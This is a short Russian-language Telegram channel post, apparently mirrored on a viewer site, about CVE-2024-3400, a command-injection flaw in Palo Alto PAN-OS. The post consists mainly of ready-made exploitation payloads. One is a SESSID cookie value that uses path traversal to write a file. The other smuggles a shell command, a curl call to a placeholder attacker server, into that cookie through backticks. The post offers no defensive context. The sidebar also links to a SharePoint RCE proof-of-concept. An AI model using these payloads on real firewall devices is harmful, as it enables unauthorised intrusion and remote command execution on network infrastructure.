TGViewer
Записки Лизы Записки Лизы @lisasn0tes · 175 subscribers
Post #63 930
CVE-2024-3400 - внедрение команд ОС в функции PAN-OS

Если же говорить об эксплуатации :
В куках SESSID можно сделать os command injection

Запись файла
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere

Os command injection же можно сделать вот так:
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere`curl${IFS}http://<you_server>`
  • 👍 5
  • 🥰 1
More from @lisasn0tes
  1. May 24, 2026Полный путь утечки выглядит следующим образом: ▫️Метод Decode передаёт сохраненную длину к…
  2. May 24, 2026В прошлом месяце была найдена уязвимость в Firefox и Thunderbird - CVE-2026-5734. Она поме…
  3. May 24, 2026Я вернулась :)
  4. Jul 25, 2024https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC
  5. Jun 8, 2024www.reddit.com/r/programming/comments/1dao5oc/critical_php_vulnerability_exposes_servers_t…
  6. May 20, 2024Из истории можно сделать довольно простые выводы "Цифровой след: Осинт под микроскопом" Ци…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →